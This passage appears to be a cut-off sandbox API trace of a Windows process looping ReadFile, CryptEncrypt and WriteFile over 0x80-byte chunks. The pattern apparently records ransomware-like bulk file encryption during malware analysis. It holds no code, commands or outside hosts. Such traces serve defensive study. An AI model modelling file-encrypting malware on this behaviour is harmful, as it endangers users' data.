lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.168] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.168] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.169] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.169] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.170] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.170] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.171] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.171] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.172] WriteFile (in: hFile=0xc4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.172] ReadFile (in: hFile=0xb8, lpBuffer=0x37aad0, 